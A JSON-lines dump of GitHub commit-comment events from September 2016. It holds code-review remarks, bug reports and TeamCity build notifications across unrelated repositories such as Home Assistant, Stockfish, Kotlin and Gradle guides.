{"id":"4526517580","type":"CommitCommentEvent","actor":{"login":"Hypfer"},"repo":{"name":"numixproject/numix-icon-theme"},"payload":{"comment":{"id":18925632,"position":null,"line":null,"path":null,"commit_id":"5fc017f271c081c495336a97849d942df98b4ab1","created_at":"2016-09-07T09:39:55Z","updated_at":"2016-09-07T09:39:55Z","body":"Are you 100% sure that this is correct? I just removed /usr/share/icons/Numix completely, put the current git master version there, set the permissions, generated the icon cache and it still looks the same.\r\n\r\nMaybe something else conflicting?"}},"created_at":"2016-09-07T09:39:55Z"}
{"id":"4526518165","type":"CommitCommentEvent","actor":{"login":"mxstbr"},"repo":{"name":"mxstbr/sharingbuttons.io"},"payload":{"comment":{"id":18925634,"position":null,"line":null,"path":null,"commit_id":"6fe5c8f2d20cef0b9401405824e094c4ca2fee5a","created_at":"2016-09-07T09:40:03Z","updated_at":"2016-09-07T09:40:03Z","body":"Sorry, maybe I turned that off by accident? I've added it again and everything is there, feel free to uncomment that!"}},"created_at":"2016-09-07T09:40:03Z"}
{"id":"4526518325","type":"CommitCommentEvent","actor":{"login":"KaiKikuchi"},"repo":{"name":"KaiKikuchi/QuickShop"},"payload":{"comment":{"id":18925635,"position":null,"line":null,"path":null,"commit_id":"71b296d6f1c95987c475016e030bebaa56b7af4f","created_at":"2016-09-07T09:40:05Z","updated_at":"2016-09-07T09:40:05Z","body":"They do work if you use the bukkit format.\r\n\r\nThat would be THERMALEXPANSION_MACHINE*3"}},"created_at":"2016-09-07T09:40:05Z"}
{"id":"4526518407","type":"CommitCommentEvent","actor":{"login":"karasevb"},"repo":{"name":"karasevb/master"},"payload":{"comment":{"id":18925637,"position":10,"line":41,"path":"src/dstore/pmix_esh.c","commit_id":"8687b51770d483d6d22231c16aad0c551fb7f343","created_at":"2016-09-07T09:40:07Z","updated_at":"2016-09-07T09:40:07Z","body":"```C\r\nchar *sesid;\r\nbool setsesid;\r\n```"}},"created_at":"2016-09-07T09:40:07Z"}
{"id":"4526519554","type":"CommitCommentEvent","actor":{"login":"DimOOOn91"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18925639,"position":95,"line":95,"path":"src/module03/homework/task4/User.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-07T09:40:21Z","updated_at":"2016-09-07T09:40:21Z","body":"точно! исправил!"}},"created_at":"2016-09-07T09:40:21Z"}
{"id":"4526519709","type":"CommitCommentEvent","actor":{"login":"petecooper"},"repo":{"name":"textpattern/textpattern-toolbelt"},"payload":{"comment":{"id":18925641,"position":null,"line":null,"path":null,"commit_id":"ecdfe9aa76905c50194cb3f65ce9977258f5261f","created_at":"2016-09-07T09:40:23Z","updated_at":"2016-09-07T09:40:23Z","body":"Is this Textile -> Markdown transition a thing that should be born in mind for https://github.com/textpattern/textpattern as well?"}},"created_at":"2016-09-07T09:40:23Z"}
{"id":"4526520365","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18925644,"position":null,"line":null,"path":null,"commit_id":"a7ae4edf7c799d57d69aadb66281c2927b1ec563","created_at":"2016-09-07T09:40:30Z","updated_at":"2016-09-07T09:40:30Z","body":"TeamCity Ms Demo :: Build [Build 27](http://10.22.17.95:8111/viewLog.html?buildId=51&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T09:40:30Z"}
{"id":"4526523186","type":"CommitCommentEvent","actor":{"login":"aufano"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":18925652,"position":null,"line":null,"path":null,"commit_id":"6e672b7beef016f22b4c981b4a8a2a0f511c1fba","created_at":"2016-09-07T09:41:04Z","updated_at":"2016-09-07T09:41:04Z","body":"I have a problem with the inverted up and down code, now my controls of my Fibaro Roller Shutter FGR-222 are inverted in hass, I think my wires are ok because in Domoticz works fine. ¿Maybe put a boolean to invert? I don`t know if I am the only one with this problem.. "}},"created_at":"2016-09-07T09:41:04Z"}
{"id":"4526523454","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18925653,"position":null,"line":null,"path":null,"commit_id":"a7ae4edf7c799d57d69aadb66281c2927b1ec563","created_at":"2016-09-07T09:41:08Z","updated_at":"2016-09-07T09:41:08Z","body":"TeamCity Ms Demo :: Build [Build 27](http://10.22.17.95:8111/viewLog.html?buildId=51&buildTypeId=MsDemo_Build) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 3 Build time: 00:00:36\n### Failed tests\n```\ncom.epam.clientprofolio.dao.ClientProfolioDaoTest.shouldGetClientProfolioById: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T09:41:08Z"}
{"id":"4526523702","type":"CommitCommentEvent","actor":{"login":"DimOOOn91"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18925654,"position":68,"line":68,"path":"src/module03/homework/task4/User.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-07T09:41:10Z","updated_at":"2016-09-07T09:41:10Z","body":"исправил \"paySallery\" на \"paySalary\""}},"created_at":"2016-09-07T09:41:10Z"}
{"id":"4526526169","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18925659,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-07T09:41:40Z","updated_at":"2016-09-07T09:41:40Z","body":"@mcostalba, ok, won't raise a pull request. \r\nI wanted to point out that the gives_threat() test was around 1ELO before purging. Otherwise it wouldn't have run for 58K games and failed with LLR -5.32\r\nhttp://tests.stockfishchess.org/tests/view/57ca38180ebc59030fbe4da0\r\n\r\nA small variation of that idea is still running at more than 1 ELO(right now):\r\nhttp://tests.stockfishchess.org/tests/view/57ce56930ebc59030fbe4f68\r\n\r\nAnother version with just pawn threats was also yellow:\r\nhttp://tests.stockfishchess.org/tests/view/57c6e4650ebc59030fbe4c20\r\n\r\nSo I'm not really trying to sneak in a patch. If you try running both patches at LTC you will probably know which one is stronger.\r\n\r\n"}},"created_at":"2016-09-07T09:41:40Z"}
{"id":"4526526380","type":"CommitCommentEvent","actor":{"login":"DimOOOn91"},"repo":{"name":"DimOOOn91/Lesovoy"},"payload":{"comment":{"id":18925660,"position":3,"line":3,"path":"src/module04/homework/task1/BanSystem.java","commit_id":"ee973c05257882211cb0f0d2e79855c1a3101f28","created_at":"2016-09-07T09:41:42Z","updated_at":"2016-09-07T09:41:42Z","body":"исправил"}},"created_at":"2016-09-07T09:41:42Z"}
{"id":"4526526886","type":"CommitCommentEvent","actor":{"login":"pbimpisidis"},"repo":{"name":"dfensgmbh/biz.dfch.PS.Appclusive.Client"},"payload":{"comment":{"id":18925662,"position":38,"line":139,"path":"it/KeyNameValue.Tests.ps1","commit_id":"8430ccfe9fcafd7ca07b4ab35788bf4cd8406539","created_at":"2016-09-07T09:41:47Z","updated_at":"2016-09-07T09:41:47Z","body":"@rufer7 \r\nIs there any example for that? can't find one on git. I tried replacing it but I still get empty variable on line 139"}},"created_at":"2016-09-07T09:41:47Z"}
{"id":"4526529958","type":"CommitCommentEvent","actor":{"login":"zyuanming"},"repo":{"name":"zyuanming/YMEmojiUtils"},"payload":{"comment":{"id":18925666,"position":null,"line":null,"path":null,"commit_id":"3e4984833db200c264a76236175bacff079e5165","created_at":"2016-09-07T09:42:23Z","updated_at":"2016-09-07T09:42:23Z","body":"this is me ...."}},"created_at":"2016-09-07T09:42:23Z"}
{"id":"4526534585","type":"CommitCommentEvent","actor":{"login":"954329837"},"repo":{"name":"954329837/954329837.github.io"},"payload":{"comment":{"id":18925673,"position":null,"line":null,"path":null,"commit_id":"8e7eed9da9b94092bc999ff26db920bc113766ed","created_at":"2016-09-07T09:43:19Z","updated_at":"2016-09-07T09:43:19Z","body":"https://954329837.github.io/"}},"created_at":"2016-09-07T09:43:19Z"}
{"id":"4526535160","type":"CommitCommentEvent","actor":{"login":"eloimuns"},"repo":{"name":"bq-dev/android_kernel_bq_common"},"payload":{"comment":{"id":18925676,"position":null,"line":null,"path":null,"commit_id":"d08a2765caea4c97587a5bacf1be760bdddf7018","created_at":"2016-09-07T09:43:27Z","updated_at":"2016-09-07T09:43:27Z","body":"It's fixed now. I think it doesn't apply but @Kra1o5 maybe can confirm it. "}},"created_at":"2016-09-07T09:43:27Z"}
{"id":"4526537012","type":"CommitCommentEvent","actor":{"login":"andreyryabin"},"repo":{"name":"XOlegator/sprint.migration"},"payload":{"comment":{"id":18925685,"position":null,"line":null,"path":null,"commit_id":"e716ea2f9dc585336019b7bbf440d8958a5c535e","created_at":"2016-09-07T09:43:48Z","updated_at":"2016-09-07T09:43:48Z","body":"Спасибо, перепроверим на релизной ветке и вольем в мастер, ваш форк видимо надо будет обновить"}},"created_at":"2016-09-07T09:43:48Z"}
{"id":"4526537578","type":"CommitCommentEvent","actor":{"login":"tomschr"},"repo":{"name":"SUSE/doc-sleha"},"payload":{"comment":{"id":18925687,"position":null,"line":null,"path":null,"commit_id":"54812f03450a5244b827ba58f36769f11c45b0e7","created_at":"2016-09-07T09:43:56Z","updated_at":"2016-09-07T09:43:56Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9gNADObW&#x2F;11-adjust-license-of-nsf-quick-no-longer-in-sync-with-linbit-stuff\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> adjust license of NSF Quick? (no longer in sync with linbit stuff)</a>"}},"created_at":"2016-09-07T09:43:56Z"}
{"id":"4526538968","type":"CommitCommentEvent","actor":{"login":"sriramselvarajdit"},"repo":{"name":"thomasjiji/first-program"},"payload":{"comment":{"id":18925693,"position":3,"line":2,"path":"README.md","commit_id":"6394e216944fd538db982a843d2a883460e09b18","created_at":"2016-09-07T09:44:13Z","updated_at":"2016-09-07T09:44:13Z","body":"hahaha....."}},"created_at":"2016-09-07T09:44:13Z"}
{"id":"4526539212","type":"CommitCommentEvent","actor":{"login":"akhachaturan"},"repo":{"name":"akhachaturan/test_code_collab"},"payload":{"comment":{"id":18925696,"position":null,"line":null,"path":null,"commit_id":"c00876182f8d32b3c7691b2f5aa84bf5db07d429","created_at":"2016-09-07T09:44:16Z","updated_at":"2016-09-07T09:44:16Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=1)"}},"created_at":"2016-09-07T09:44:16Z"}
{"id":"4526539817","type":"CommitCommentEvent","actor":{"login":"RolfKocherhans"},"repo":{"name":"RolfKocherhans/autopkg-recipes"},"payload":{"comment":{"id":18925697,"position":4,"line":49,"path":"Tivoli-Storage-Manager/TivoliStorageManagerURLProviderNew.py","commit_id":"3ff6650f50a953eebdc80d89a66fb30f2bad7cb6","created_at":"2016-09-07T09:44:23Z","updated_at":"2016-09-07T09:44:23Z","body":"zurück"}},"created_at":"2016-09-07T09:44:23Z"}
{"id":"4526545386","type":"CommitCommentEvent","actor":{"login":"sunkibaek"},"repo":{"name":"huiseoul/huiseoul.github.io"},"payload":{"comment":{"id":18925708,"position":null,"line":null,"path":null,"commit_id":"717c5ac1161771db18fe9fe2ffa1a112604ee0d7","created_at":"2016-09-07T09:45:27Z","updated_at":"2016-09-07T09:45:27Z","body":":+1:"}},"created_at":"2016-09-07T09:45:27Z"}
{"id":"4526546239","type":"CommitCommentEvent","actor":{"login":"karasevb"},"repo":{"name":"karasevb/master"},"payload":{"comment":{"id":18925710,"position":612,"line":803,"path":"src/dstore/pmix_esh.c","commit_id":"8687b51770d483d6d22231c16aad0c551fb7f343","created_at":"2016-09-07T09:45:37Z","updated_at":"2016-09-07T09:45:37Z","body":"Add `_esh_deregister_nspace`"}},"created_at":"2016-09-07T09:45:37Z"}
{"id":"4526546405","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18925711,"position":null,"line":null,"path":null,"commit_id":"a7ae4edf7c799d57d69aadb66281c2927b1ec563","created_at":"2016-09-07T09:45:39Z","updated_at":"2016-09-07T09:45:39Z","body":"TeamCity Ms Demo :: Build [Build 28](http://10.22.17.95:8111/viewLog.html?buildId=52&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T09:45:39Z"}
{"id":"4526548776","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18925716,"position":null,"line":null,"path":null,"commit_id":"a7ae4edf7c799d57d69aadb66281c2927b1ec563","created_at":"2016-09-07T09:46:08Z","updated_at":"2016-09-07T09:46:08Z","body":"TeamCity Ms Demo :: Build [Build 28](http://10.22.17.95:8111/viewLog.html?buildId=52&buildTypeId=MsDemo_Build) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 3 Build time: 00:00:30\n### Failed tests\n```\ncom.epam.clientprofolio.dao.ClientProfolioDaoTest.shouldGetClientProfolioById: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T09:46:08Z"}
{"id":"4526549092","type":"CommitCommentEvent","actor":{"login":"Dragios"},"repo":{"name":"j-selby/citra"},"payload":{"comment":{"id":18925717,"position":6,"line":190,"path":"src/core/hw/gpu.cpp","commit_id":"f24a018fee7f8cd69810b276b79ebd39010dec1e","created_at":"2016-09-07T09:46:12Z","updated_at":"2016-09-07T09:46:12Z","body":"I think both can be combined into single condition using AND operator\r\n`if (input_width && output_width > 0 {`"}},"created_at":"2016-09-07T09:46:12Z"}
{"id":"4526550228","type":"CommitCommentEvent","actor":{"login":"Fastjur"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":18925725,"position":16,"line":16,"path":"src/test/java/net/liquidpineapple/pang/BallTest.java","commit_id":"cf983120234891f0a61eac6480faf4d0657724de","created_at":"2016-09-07T09:46:24Z","updated_at":"2016-09-07T09:46:24Z","body":"This testing functionality is already in ApplicationTest.java. No need to have it here. You should remove it. (Maybe convert this method to the @before so you can use it in later tests for the ball."}},"created_at":"2016-09-07T09:46:24Z"}
{"id":"4526552314","type":"CommitCommentEvent","actor":{"login":"Fastjur"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":18925731,"position":22,"line":22,"path":"src/test/java/net/liquidpineapple/pang/BallTest.java","commit_id":"cf983120234891f0a61eac6480faf4d0657724de","created_at":"2016-09-07T09:46:49Z","updated_at":"2016-09-07T09:46:49Z","body":"Same here, should be removed."}},"created_at":"2016-09-07T09:46:49Z"}
{"id":"4526554662","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18925734,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-07T09:47:18Z","updated_at":"2016-09-07T09:47:18Z","body":"@ajithcj : just for the fun, here is the promised rewrite of the pos.give_threat() function:\r\n\r\n````\r\n/// Position::move_threats() returns the threats of a knight or pawn move\r\nBitboard Position::move_threats(Move m) const {\r\n\r\n  Square to = to_sq(m);\r\n  Piece pc = piece_on(to);\r\n  PieceType pt = type_of(pc);\r\n  \r\n  if (!( pt == PAWN || pt == KNIGHT ))\r\n      return 0;\r\n      \r\n  Bitboard targets = pieces(~color_of(pc), ROOK, QUEEN);\r\n  if (pt == PAWN) \r\n     targets |= pieces(~color_of(pc), BISHOP, KNIGHT);\r\n\r\n  return StepAttacksBB[pc][to] & targets;\r\n}\r\n````\r\n\r\nHope this helps, Stéphane"}},"created_at":"2016-09-07T09:47:18Z"}
{"id":"4526555133","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18925735,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T09:47:24Z","updated_at":"2016-09-07T09:47:24Z","body":"Great stuff"}},"created_at":"2016-09-07T09:47:24Z"}
{"id":"4526557775","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18925740,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T09:47:52Z","updated_at":"2016-09-07T09:47:52Z","body":"Great stuff"}},"created_at":"2016-09-07T09:47:52Z"}
{"id":"4526559040","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":18925742,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-07T09:48:08Z","updated_at":"2016-09-07T09:48:08Z","body":"Great\nStuff"}},"created_at":"2016-09-07T09:48:08Z"}
{"id":"4526563953","type":"CommitCommentEvent","actor":{"login":"philwareham"},"repo":{"name":"textpattern/textpattern-toolbelt"},"payload":{"comment":{"id":18925751,"position":null,"line":null,"path":null,"commit_id":"ecdfe9aa76905c50194cb3f65ce9977258f5261f","created_at":"2016-09-07T09:49:03Z","updated_at":"2016-09-07T09:49:03Z","body":"Eventually, yes, for README files for GitHub I think we should use Markdown.\r\n\r\nFor example, if we provide NPM versions of repos (like I do for the [default theme](https://www.npmjs.com/package/textpattern-default-theme)) then the NPM website expects Markdown, for better or worse."}},"created_at":"2016-09-07T09:49:03Z"}
{"id":"4526565445","type":"CommitCommentEvent","actor":{"login":"hammerkid"},"repo":{"name":"hammerkid/PT2-02-16-P1"},"payload":{"comment":{"id":18925753,"position":1,"line":1,"path":"script.py","commit_id":"fc9547e5a312af188164c76576c4af8920107a2e","created_at":"2016-09-07T09:49:20Z","updated_at":"2016-09-07T09:49:20Z","body":"123"}},"created_at":"2016-09-07T09:49:20Z"}
{"id":"4526568834","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18925760,"position":9,"line":0,"path":"js/js.libraries/src/core/collections/AbstractList.kt","commit_id":"5de70252213be5975852f4c511f037e1cf629ded","created_at":"2016-09-07T09:49:59Z","updated_at":"2016-09-07T09:49:59Z","body":"- It's not required by the contract\n- It complicates the implementation\n- It isn't implemented in GWT, where we have borrowed `AbstractList`"}},"created_at":"2016-09-07T09:49:59Z"}
{"id":"4526570972","type":"CommitCommentEvent","actor":{"login":"petecooper"},"repo":{"name":"textpattern/textpattern-toolbelt"},"payload":{"comment":{"id":18925768,"position":null,"line":null,"path":null,"commit_id":"ecdfe9aa76905c50194cb3f65ce9977258f5261f","created_at":"2016-09-07T09:50:24Z","updated_at":"2016-09-07T09:50:24Z","body":"Agreed. Thanks for clarification."}},"created_at":"2016-09-07T09:50:24Z"}
{"id":"4526579271","type":"CommitCommentEvent","actor":{"login":"dushyants19"},"repo":{"name":"InfiniteFlightAirportEditing/Airports"},"payload":{"comment":{"id":18925782,"position":null,"line":null,"path":null,"commit_id":"b9c6faa9fb77120b2959e552883f1a27b7b87f85","created_at":"2016-09-07T09:51:58Z","updated_at":"2016-09-07T09:51:58Z","body":"Not redone, He made some improvements :) "}},"created_at":"2016-09-07T09:51:58Z"}
{"id":"4526579963","type":"CommitCommentEvent","actor":{"login":"Fastjur"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":18925785,"position":null,"line":null,"path":null,"commit_id":"46f5631ee4c0ee4f496c3f40c8fcd02a5efbf098","created_at":"2016-09-07T09:52:08Z","updated_at":"2016-09-07T09:52:08Z","body":"@Wolgo Please not that javaclasses [should be capitalized](https://docs.oracle.com/javase/tutorial/java/javaOO/classes.html)"}},"created_at":"2016-09-07T09:52:08Z"}
{"id":"4526582908","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925794,"position":8,"line":145,"path":"README.adoc","commit_id":"6e3c5380d6db76e94793de0517063757efc83099","created_at":"2016-09-07T09:52:43Z","updated_at":"2016-09-07T09:52:43Z","body":"> Is this sensible? My main concern is that it sends users down the rabbit hole of configuring tasks. If we don't link to documentation on that, I'm not sure we should link to the Jar-specific stuff.\r\n\r\nMy intention here was to exploit a \"learning opportunity\". In the snippet above, we tell the user to type `jar { ... }` to customize the manifest. To the uninitiated this will be little more than a magical incantation. That is, it will _work_, but they won't have any access to understanding _why_, much less any sense of what else is possible with configuring JARs in Gradle.\r\n\r\nIt would definitely be a digression to attempt to explain any of that inline with this guide, but we would be remiss, I believe, if we didn't point the user to resources that can help them learn more _if they're interested in doing so_. We can't predict whether they'll want to follow those links, but I think it's reasonable to predict that most readers will appreciate that we've included them, i.e. that we've given them the _option_ to dig deeper.\r\n\r\nWDYT?\r\n\r\n> To add to my concerns, the Jar page in the DSL reference doesn't show any examples, unlike several of the other reference pages, such as Test.\r\n\r\nI agree that the specific resources linked to here leave a bit to be desired, especially the fact that the language reference doesn't include any examples. That actually has a lot to do with the way I worded the admonition. In it, I wrote:\r\n\r\n>> For a complete list [of Jar properties that can be configured], see the Jar section of the Gradle Language Reference.\r\n\r\nAnd the Jar section of the language reference does do at least that much. It's not perfect, but I don't know what we could point to that would be better. I looked and didn't find anything. Any suggestions?"}},"created_at":"2016-09-07T09:52:43Z"}
{"id":"4526585305","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18925799,"position":null,"line":null,"path":null,"commit_id":"a7ae4edf7c799d57d69aadb66281c2927b1ec563","created_at":"2016-09-07T09:53:13Z","updated_at":"2016-09-07T09:53:13Z","body":"TeamCity Ms Demo :: Build [Build 29](http://10.22.17.95:8111/viewLog.html?buildId=54&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T09:53:13Z"}
{"id":"4526588527","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18925811,"position":null,"line":null,"path":null,"commit_id":"a7ae4edf7c799d57d69aadb66281c2927b1ec563","created_at":"2016-09-07T09:53:48Z","updated_at":"2016-09-07T09:53:48Z","body":"TeamCity Ms Demo :: Build [Build 29](http://10.22.17.95:8111/viewLog.html?buildId=54&buildTypeId=MsDemo_Build) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 3 Build time: 00:00:36\n### Failed tests\n```\ncom.epam.clientprofolio.dao.ClientProfolioDaoTest.shouldGetClientProfolioById: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T09:53:48Z"}
{"id":"4526589049","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925813,"position":null,"line":null,"path":null,"commit_id":"5c41baad082fdf204ef7d00a01689ccece1c87dc","created_at":"2016-09-07T09:53:54Z","updated_at":"2016-09-07T09:53:54Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 948](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12835&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T09:53:54Z"}
{"id":"4526590854","type":"CommitCommentEvent","actor":{"login":"Sempra90"},"repo":{"name":"Shibby7986/PokemonGo-Map"},"payload":{"comment":{"id":18925822,"position":null,"line":null,"path":null,"commit_id":"e0c544ea37fbad32858cac7e2ab1c57fe9aaef90","created_at":"2016-09-07T09:54:15Z","updated_at":"2016-09-07T09:54:15Z","body":"is this working with the latest build? "}},"created_at":"2016-09-07T09:54:15Z"}
{"id":"4526593732","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925832,"position":null,"line":null,"path":null,"commit_id":"e468813fc032c5558eb3f384b2d886e919d7515b","created_at":"2016-09-07T09:54:46Z","updated_at":"2016-09-07T09:54:46Z","body":"We're not using the project name in the build at the moment I think, so it's fine for the moment. But I hate the fact that the project will change its name because someone put it in a differently-named directory. Or renamed the project directory. If our build does start using the project name in any way, I think we should revisit this."}},"created_at":"2016-09-07T09:54:46Z"}
{"id":"4526596302","type":"CommitCommentEvent","actor":{"login":"ruthdw"},"repo":{"name":"ocadotechnology/codeforlife-portal"},"payload":{"comment":{"id":18925843,"position":5,"line":68,"path":"portal/static/portal/js/teach_browser.js","commit_id":"0ef6555c1f2e1091d9dbefc4c72cd5746959b682","created_at":"2016-09-07T09:55:16Z","updated_at":"2016-09-07T09:55:16Z","body":"Oops, added a semicolon"}},"created_at":"2016-09-07T09:55:16Z"}
{"id":"4526601612","type":"CommitCommentEvent","actor":{"login":"Dee-2015"},"repo":{"name":"rubyide/vscode-ruby"},"payload":{"comment":{"id":18925847,"position":null,"line":null,"path":null,"commit_id":"b69fb50645363d8d9a430b12d41f27995f3ee722","created_at":"2016-09-07T09:56:16Z","updated_at":"2016-09-07T09:56:16Z","body":"Hi there, just noticed that code complete / Intellisense broke recently. I.e. I used to see a list of previously variables, function names et cetera when using this extension in Visual Studio Code. Now I don't anymore.\r\nRemoving the extension enables code complete again. Is this expected behavior?"}},"created_at":"2016-09-07T09:56:16Z"}
{"id":"4526606105","type":"CommitCommentEvent","actor":{"login":"ligangty"},"repo":{"name":"ligangty/galley"},"payload":{"comment":{"id":18925853,"position":null,"line":null,"path":null,"commit_id":"84b3c1148b802f347ce81ae4d3d580a91a056617","created_at":"2016-09-07T09:57:07Z","updated_at":"2016-09-07T09:57:07Z","body":"Hi, @jdcasey. \r\nIn this commit, I've merged the CacheProviderRouter in to the RoutingCacheProviderWrapper.\r\nBut I'm still confused about that interface which is similar with SpecialPathManager. What we do now in this RoutingCacheProviderWrapper now is to accept a Map<String, CacheProvider> here, which the key is a regex pattern and value is the CacheProvider which is used to matched and delegate. So what we need here is a Matcher liked thing that can match the ConcreteResource's path or uri to the map's key to find the delegated CacheProvider. That means the method in this interface is like \r\n\r\n`\r\n    boolean matches(ConcreteResource resource, String pattern)\r\n`\r\n\r\nor anything similar like (uri, pattern) or (path, pattern), and then we can loop the map keys and use this interface to match the key to find the CacheProvider.  But after I had a look in SpecialPathManagerImpl, I found it accepts a bunch of SpecialPathInfo which the underlying accepts the SpecialPathMatcher, and is really complex for use here. So I'm wondering if it is a good solution here.\r\n\r\nMy current solution is using SpecialPathMatcher instead. You can see it there in getMatchedProvider method, and the way to use is in the Unit Test. After checking with PathPatternMatcher and FilePatternMatcher, I think I'm not using the right way WRT Matcher's definition. So I just used it as an concept proof here to show my thoughts of this API. \r\n\r\nWaiting for your comments. "}},"created_at":"2016-09-07T09:57:07Z"}
{"id":"4526610628","type":"CommitCommentEvent","actor":{"login":"pledbrook"},"repo":{"name":"gradle-guides/gs-building-java-libraries"},"payload":{"comment":{"id":18925863,"position":null,"line":null,"path":null,"commit_id":"8db3c0591ee2f8c81936b63c90e220463d56b9ff","created_at":"2016-09-07T09:57:55Z","updated_at":"2016-09-07T09:57:55Z","body":"It wouldn't need to be in every guide, because not every guide creates a Java project :smile: But if the plan is to do something more substantive later, I'm fine with that. Really this comes down to our gut feelings over whether readers will realise that a project created from an IDE is fine. And we have no metrics or feedback on that score.\r\n\r\nAnyway, happy to leave it out for now."}},"created_at":"2016-09-07T09:57:55Z"}
{"id":"4526611135","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18925864,"position":null,"line":null,"path":null,"commit_id":"6bd8d9f27e992ab44a3d6eb8e195b9316113dd38","created_at":"2016-09-07T09:58:01Z","updated_at":"2016-09-07T09:58:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 949](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12838&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-07T09:58:01Z"}
{"id":"4526614204","type":"CommitCommentEvent","actor":{"login":"Fastjur"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":18925874,"position":36,"line":35,"path":"src/main/java/net/liquidpineapple/pang/objects/ball.java","commit_id":"46f5631ee4c0ee4f496c3f40c8fcd02a5efbf098","created_at":"2016-09-07T09:58:35Z","updated_at":"2016-09-07T09:58:35Z","body":"Please convert this to a more readable format. Use lines breaks before and after the { etc. Refer to [this style guide](https://google.github.io/styleguide/javaguide.html) if you are uncertain."}},"created_at":"2016-09-07T09:58:35Z"}
{"id":"4526616501","type":"CommitCommentEvent","actor":{"login":"PatrickStar0913"},"repo":{"name":"PatrickStar0913/Highlights-Prediction-on-News"},"payload":{"comment":{"id":18925879,"position":null,"line":null,"path":null,"commit_id":"430e43ca868cd6c734554f40b2d1d721a0b6b42a","created_at":"2016-09-07T09:59:00Z","updated_at":"2016-09-07T09:59:00Z","body":"This is for date description to analyze the distribution of domains."}},"created_at":"2016-09-07T09:59:00Z"}
{"id":"4526616878","type":"CommitCommentEvent","actor":{"login":"cuboideum"},"repo":{"name":"RDFBones/FrSexEst"},"payload":{"comment":{"id":18925880,"position":null,"line":null,"path":null,"commit_id":"67ec642065456c10637ed70a561b6d23b7596877","created_at":"2016-09-07T09:59:04Z","updated_at":"2016-09-07T09:59:04Z","body":"@MasterChief13 Please revert this commit, as the file name is important for how the contents are displayed in GitHub."}},"created_at":"2016-09-07T09:59:04Z"}
